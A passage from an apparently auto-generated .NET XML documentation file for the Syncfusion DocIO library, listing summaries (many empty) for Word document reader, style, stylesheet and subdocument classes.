        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReaderBase.CurrentTextPosition">
            <summary>
            Gets current text position relative to document text start(2048).
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReaderBase.Bookmarks">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReaderBase.CurrentBookmark">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReaderBase.BookmarkAfterParaEnd">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReaderBase.IsBKMKStartAfterParaEnd">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReaderBase.IsBookmarkStart">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReaderBase.Version">
            <summary>
            Gets the document version.
            </summary>
            <value>The version.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReaderBase.Encoding">
            <summary>
            Encoding of current read text chunk.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReaderBase.EncodingCharSize">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReaderBase.CurrentStyle">
            <summary>
            Gets current style
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReaderBase.StartTextPos">
            <summary>
            Gets the start text position.
            </summary>
            <value>The start text pos.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReaderBase.EndTextPos">
            <summary>
            Gets the end text position.
            </summary>
            <value>The end text pos.</value>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordReader.DEF_PID_CODEPAGE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordReader.m_bDisposed">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordReader.m_bDestroyStream">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordReader.m_secProperties">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordReader.m_bHeaderRead">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordReader.m_lastReader">
            <summary>
            Contains current subdocument reader
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordReader.m_builtinProp">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordReader.m_custProp">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordReader.m_strEncoding">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordReader.m_customFnSplittedTextLength">
            <summary>
            To holds the custom footnote splitted text length, i.e, text before the custome foot note marker
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReader.#ctor(System.IO.Stream)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.WordReader"/> class.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReader.#ctor(System.String)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.WordReader"/> class.
            </summary>
            <param name="fileName">Name of the file.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReader.GetSubdocumentReader(Syncfusion.DocIO.ReaderWriter.WordSubdocument)">
            <summary>
            Gets subdocument reader of specified type.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReader.ReadDocumentHeader(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Read header from the document.
            </summary>
            <returns></returns>     
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReader.ReadSummaryManaged">
            <summary>
            Reads the Summary information and Document Summary information
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReader.ReadDocumentProperties(Syncfusion.CompoundFile.DocIO.Net.DocumentPropertyCollection)">
            <summary>
            Reads the document properties
            </summary>
            <param name="properties"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReader.ReadProperties(Syncfusion.CompoundFile.DocIO.Net.PropertySection,System.Collections.IDictionary,System.Boolean,System.Boolean)">
            <summary>
            Read the properties in the PropertySection
            </summary>
            <param name="section"></param>
            <param name="dicProperties"></param>
            <param name="bSummary"></param>
            <param name="bBuiltIn"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReader.ReadChunk">
            <summary>
            Read next elementary text string*.
            </summary>
            <remarks>
            * - "elementary text string" - string, in which all symbols have the 
            identical character/paragraph/section properties.
            </remarks>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReader.ReadDocumentEnd">
            <summary>
            Reads end of the document
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReader.GetFld">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReader.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReader.GetFSPA">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReader.FreezeStreamPos">
            <summary>
            Freeze position in stream
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReader.UnfreezeStreamPos">
            <summary>
            Unfreeze position in stream
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReader.InitClass">
            <summary>
            Class initialization.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReader.UpdateEndPositions(System.Int64)">
            <summary>
            Updates end positions of CHPx/PAPx/SEP
            </summary>
            <param name="iEndPos"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReader.UpdateSectionProperties">
            <summary>
            Update section properties to current
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReader.UpdateStyleSheet">
            <summary>
            Updates stylesheet data
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReader.UpdateStyleProperties(Syncfusion.DocIO.ReaderWriter.WordStyle,Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord)">
            <summary>
            Converts characters/paragraphs properties to style properties.
            </summary>
            <param name="style"></param>
            <param name="record"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReader.CopyStream(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="entryStream"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReader.Dispose">
            <summary>
            Performs application-defined tasks associated with freeing, releasing, or resetting unmanaged resources.
            </summary>
        </member>
        <member name="E:Syncfusion.DocIO.ReaderWriter.WordReader.NeedPassword">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReader.DOP">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReader.StatePositions">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReader.SectionNumber">
            <summary>
            Gets current section number.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReader.SectionProperties">
            <summary>
            Gets section's properties
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReader.BuiltinDocumentProperties">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReader.CustomDocumentProperties">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReader.MacrosStream">
            <summary>
            Get document's Macros data
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReader.MacroCommands">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReader.Variables">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReader.GrammarSpellingData">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReader.IsFootnote">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReader.CustomFnSplittedTextLength">
            <summary>
            Custom Footnote splitted text length
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReader.IsEndnote">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReader.StandardAsciiFont">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReader.StandardFarEastFont">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReader.StandardNonFarEastFont">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReader.StandardBidiFont">
            <summary>
            Gets the standard/default bidi font
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReader.IsEncrypted">
            <summary>
            Gets a value indicating whether the document is encrypted.
            </summary>
            <value>
            <c>true</c> if the document is encrypted; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReader.AssociatedStrings">
            <summary>
            Gets or sets the associated strings.
            </summary>
            <value>The associated strings.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReader.SttbfRMark">
            <summary>
            Gets or sets the STTBF r mark.
            </summary>
            <value>
            The STTBF r mark.
            </value>
        </member>
        <member name="T:Syncfusion.DocIO.WordRWAdapterBase">
            <summary>
            Summary description for WordRWAdapterBase.
            <exclude/>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.WordRWAdapterBase.m_mainReader">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.WordRWAdapterBase.m_mainWriter">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.WordRWAdapterBase.m_textPos">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.WordRWAdapterBase.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.WordRWAdapterBase.Read(Syncfusion.DocIO.ReaderWriter.IWordReader)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.WordRWAdapterBase.ReadBody(Syncfusion.DocIO.ReaderWriter.IWordReader)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.WordRWAdapterBase.ReadHFBody(Syncfusion.DocIO.ReaderWriter.IWordReader)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.WordRWAdapterBase.ReadTextBoxBody(Syncfusion.DocIO.ReaderWriter.WordSubdocumentReader,System.Int32)">
            <summary>
            Textbox reader
            </summary>
            <param name="txbxReader"></param>
            <param name="txbxIndex"></param>
        </member>
        <member name="M:Syncfusion.DocIO.WordRWAdapterBase.ReadChunk(Syncfusion.DocIO.ReaderWriter.IWordReaderBase)">
            <summary>
            
            </summary>
            <param name="baseReader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.WordRWAdapterBase.ReadChunkBase(Syncfusion.DocIO.ReaderWriter.IWordReaderBase)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.WordRWAdapterBase.ReadSubDocumentBody(Syncfusion.DocIO.ReaderWriter.IWordReaderBase,Syncfusion.DocIO.ReaderWriter.WordSubdocument)">
            <summary>
            
            </summary>
            <param name="reader"></param>
            <param name="subDocument"></param>
        </member>
        <member name="M:Syncfusion.DocIO.WordRWAdapterBase.ReadChunkBefore(Syncfusion.DocIO.ReaderWriter.IWordReaderBase)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.WordRWAdapterBase.ReadPageBreak(Syncfusion.DocIO.ReaderWriter.IWordReader)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.WordRWAdapterBase.ReadBreak(Syncfusion.DocIO.ReaderWriter.IWordReader,Syncfusion.DocIO.DLS.BreakType)">
            <summary>
            
            </summary>
            <param name="reader"></param>
            <param name="breakType"></param>
        </member>
        <member name="M:Syncfusion.DocIO.WordRWAdapterBase.ReadSectionEnd(Syncfusion.DocIO.ReaderWriter.IWordReader)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.WordRWAdapterBase.ReadField(Syncfusion.DocIO.ReaderWriter.IWordReaderBase)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.WordRWAdapterBase.ReadTable(Syncfusion.DocIO.ReaderWriter.IWordReaderBase)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.WordRWAdapterBase.ReadTableRow(Syncfusion.DocIO.ReaderWriter.IWordReaderBase)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.WordRWAdapterBase.ReadTableCell(Syncfusion.DocIO.ReaderWriter.IWordReaderBase)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.WordRWAdapterBase.ReadImage(Syncfusion.DocIO.ReaderWriter.IWordReaderBase)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.WordRWAdapterBase.ReadParagraphEnd(Syncfusion.DocIO.ReaderWriter.IWordReaderBase)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.WordRWAdapterBase.ReadText(Syncfusion.DocIO.ReaderWriter.IWordReaderBase)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.WordRWAdapterBase.ReadStyleSheet(Syncfusion.DocIO.ReaderWriter.IWordReader)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.WordRWAdapterBase.ReadLineBreak(Syncfusion.DocIO.ReaderWriter.IWordReaderBase)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.WordRWAdapterBase.ReadShape(Syncfusion.DocIO.ReaderWriter.IWordReaderBase)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.WordRWAdapterBase.ReadTextBoxShape(Syncfusion.DocIO.ReaderWriter.IWordReaderBase,Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.TextBoxShape)">
            <summary>
            Read textbox's shape data ( including FSPA )
            </summary>
            <param name="reader"></param>
            <param name="txtShape"></param>
        </member>
        <member name="M:Syncfusion.DocIO.WordRWAdapterBase.ReadImageShape(Syncfusion.DocIO.ReaderWriter.IWordReaderBase,Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.PictureShape)">
            <summary>
            Read image's shape data ( including FSPA )
            </summary>
            <param name="reader"></param>
            <param name="imageShape"></param>
        </member>
        <member name="M:Syncfusion.DocIO.WordRWAdapterBase.ReadShapeObjectsBody(Syncfusion.DocIO.ReaderWriter.IWordReader)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.WordRWAdapterBase.ReadSymbol(Syncfusion.DocIO.ReaderWriter.IWordReaderBase)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.WordRWAdapterBase.ReadFieldEnd(Syncfusion.DocIO.ReaderWriter.IWordReaderBase)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.WordRWAdapterBase.ReadCurrentPageNumber(Syncfusion.DocIO.ReaderWriter.IWordReaderBase)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.WordRWAdapterBase.ReadAnnotationBody(Syncfusion.DocIO.ReaderWriter.IWordReaderBase)">
            <summary>
            Reads the annotation body.
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.WordRWAdapterBase.ReadAnnotation(Syncfusion.DocIO.ReaderWriter.IWordReader)">
            <summary>
            Reads the annotation.
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.WordRWAdapterBase.ReadFootnoteBody(Syncfusion.DocIO.ReaderWriter.IWordReaderBase)">
            <summary>
            Reads the footnote body.
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.WordRWAdapterBase.ReadFootnote(Syncfusion.DocIO.ReaderWriter.IWordReader)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.WordRWAdapterBase.ReadFootnoteMarker(Syncfusion.DocIO.ReaderWriter.IWordReaderBase)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.WordStyle">
            <summary>
            Summary description for WordStyle.
            </summary>
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordStyle.m_strName">
            <summary>
            Style name
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordStyle.m_id">
            <summary>
            Style id
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordStyle.Empty">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordStyle.m_charProps">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordStyle.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordStyle.#ctor(Syncfusion.DocIO.ReaderWriter.WordStyleSheet,System.String)">
            <summary>
            Initializing constructor
            </summary>
            <param name="styleSheet"></param>
            <param name="name"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordStyle.#ctor(Syncfusion.DocIO.ReaderWriter.WordStyleSheet,System.String,System.Boolean)">
            <summary>
            Initializing constructor
            </summary>
            <param name="styleSheet"></param>
            <param name="name"></param>
            <param name="isCharacterStyle"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordStyle.UpdateCharactersProperties(Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties)">
            <summary>
            Update character properties
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordStyle.UpdateParagraphsProperties(Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties)">
            <summary>
            Update paragraph properties
            </summary>
            <param name="paraProps"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordStyle.UpdateName(System.String)">
            <summary>
            
            </summary>
            <param name="name"></param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordStyle.TableStyleData">
            <summary>
            Gets or sets the table style representation
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordStyle.TypeCode">
            <summary>
            Gets or sets the type code of the style.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordStyle.BaseStyleIndex">
            <summary>
            Gets/sets style id
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordStyle.ID">
            <summary>
            Gets/sets style id
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordStyle.IsCharacterStyle">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordStyle.Name">
            <summary>
            Gets style name
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordStyle.CharacterProperties">
            <summary>
            Gets character properties
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordStyle.ParagraphProperties">
            <summary>
            Gets paragraph properties
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordStyle.HasUpe">
            <summary>
            Indicates whether UPEs have been generated.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordStyle.NextStyleIndex">
            <summary>
            Gets or sets the index of the next style.
            </summary>
            <value>The index of the next style.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordStyle.LinkStyleIndex">
            <summary>
            Gets or sets the index of the link style.
            </summary>
            <value>The index of the link style.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordStyle.IsPrimary">
            <summary>
            Gets or sets a value indicating whether this instance is primary.
            </summary>
            <value>
            <c>true</c> if this instance is primary; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordStyle.IsSemiHidden">
            <summary>
            Gets or sets a value indicating whether this instance is semi hidden.
            </summary>
            <value>
            <c>true</c> if this instance is semi hidden; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordStyle.UnhideWhenUsed">
            <summary>
            Gets or sets a value indicating whether unhide when used.
            </summary>
            <value><c>true</c> if unhide when used; otherwise, <c>false</c>.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.WordStyleSheet">
            <summary>
            Summary description for WordStyleSheet.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordStyleSheet.DEF_NORMAL_STYLE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordStyleSheet.IsFixedIndex13HasStyle">
            <summary>
            Returns true, if the fixed index 13 in stylesheet has style. (other than empty style)
            </summary>
            <remarks>Reserved styles are applicable only for *.doc format</remarks>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordStyleSheet.IsFixedIndex14HasStyle">
            <summary>
            Returns true, if the fixed index 14 in stylesheet has style. (other than empty style)
            </summary>
            <remarks>Reserved styles are applicable only for *.doc format</remarks>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordStyleSheet.FixedIndex13StyleName">
            <summary>
            Represents the style name of the style present at the fixed index 13 in the stylesheet
            </summary>
            <remarks>Reserved styles are applicable only for *.doc format</remarks>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordStyleSheet.FixedIndex14StyleName">
            <summary>
            Represents the style name of the style present at the fixed index 14 in the stylesheet
            </summary>
            <remarks>Reserved styles are applicable only for *.doc format</remarks>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordStyleSheet.m_fontNameList">
            <summary>
            List of font names
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordStyleSheet.m_defFontNames">
            <summary>
            Default font names
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordStyleSheet.m_styleList">
            <summary>
            List of styles.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordStyleSheet.m_defStyleIndex">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordStyleSheet.m_fontSubstitutionTable">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordStyleSheet.m_styleNames">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordStyleSheet.#ctor">
            <summary>
            Initializing constructor
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordStyleSheet.#ctor(System.Boolean)">
            <summary>
            Initializing constructor
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordStyleSheet.CreateStyle(System.String)">
            <summary>
            Creates the style.
            </summary>
            <param name="name">The name.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordStyleSheet.CreateStyle(System.String,System.Boolean)">
            <summary>
            Create style with specified name
            </summary>
            <param name="name">The name.</param>
            <param name="characterStyle">if it is character style, set to <c>true</c>.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordStyleSheet.CreateStyle(System.String,System.Int32)">
            <summary>
            
            </summary>
            <param name="name"></param>
            <param name="index"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordStyleSheet.AddStyle(Syncfusion.DocIO.ReaderWriter.WordStyle)">
            <summary>
            Adds style to stylesheet
            </summary>
            <param name="style"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordStyleSheet.AddEmptyStyle">
            <summary>
            Add empty style to stylesheet
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordStyleSheet.StyleNameToIndex(System.String,System.Boolean)">
            <summary>
            Gets style index by specified style name.
            </summary>
            <param name="name">The name.</param>
            <param name="isCharacter">if it is character, set to <c>true</c>.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordStyleSheet.StyleNameToIndex(System.String)">
            <summary>
            Gets style index by specified style name.
            </summary>
            <param name="name">The name.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordStyleSheet.FontNameToIndex(System.String)">
            <summary>
            Gets font index by specified font name.
            </summary>
            <param name="name"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordStyleSheet.GetStyleByIndex(System.Int32)">
            <summary>
            Gets style by specified index.
            </summary>
            <param name="index"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordStyleSheet.UpdateStyle(System.Int32,System.String)">
            <summary>
            
            </summary>
            <param name="index"></param>
            <param name="name"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordStyleSheet.MergeStyleSheets(Syncfusion.DocIO.ReaderWriter.WordStyleSheet)">
            <summary>
            Merge current stylesheet with specified one.
            </summary>
            <param name="styleSheet"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordStyleSheet.RemoveStyleByIndex(System.Int32)">
            <summary>
            Removes the style by index.
            </summary>
            <param name="index">The index.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordStyleSheet.InsertStyle(System.Int32,Syncfusion.DocIO.ReaderWriter.WordStyle)">
            <summary>
            Inserts the style.
            </summary>
            <param name="index">The index.</param>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordStyleSheet.UpdateFontSubstitutionTable(Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameRecord)">
            <summary>
            
            </summary>
            <param name="ffnRecord"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordStyleSheet.UpdateFontName(System.String)">
            <summary>
            Updates the name of the font.
            </summary>
            <param name="name">The name.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordStyleSheet.UpdateFontNames(System.String[])">
            <summary>
            Add specified font names to collection of font names  
            </summary>
            <param name="names"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordStyleSheet.ClearFontNames">
            <summary>
            Clear font name arraylist
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordStyleSheet.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordStyleSheet.ValidateNameParameter(System.String,System.Int32)">
            <summary>
            
            </summary>
            <param name="name"></param>
            <param name="withoutIndex"></param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordStyleSheet.StyleNames">
            <summary>
            Gets the stye names.
            </summary>
            <value>The stye names.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordStyleSheet.FontSubstitutionTable">
            <summary>
            Dictionary to hold the font substitution values
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordStyleSheet.FontNamesList">
            <summary>
            Gets array of font names
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordStyleSheet.DefaultStyleIndex">
            <summary>
            Gets default style index
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordStyleSheet.StylesCount">
            <summary>
            Gets number of styles
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.WordSubdocumentReader">
            <summary>
            Implemented IWordSubdocumentReader interface, used for reading 
            Word "subdocument parts" as header/footer, footnotes, endnotes, annotations, macros, etc.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordSubdocumentReader.DEF_SECTION_NUMBER">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordSubdocumentReader.m_headerType">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordSubdocumentReader.m_itemIndex">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordSubdocumentReader.m_bIsNextItemPos">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordSubdocumentReader.m_mainReader">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordSubdocumentReader.#ctor(Syncfusion.DocIO.ReaderWriter.WordReader)">
            <summary>
            Creates subdocument reader of specified type.
            </summary>
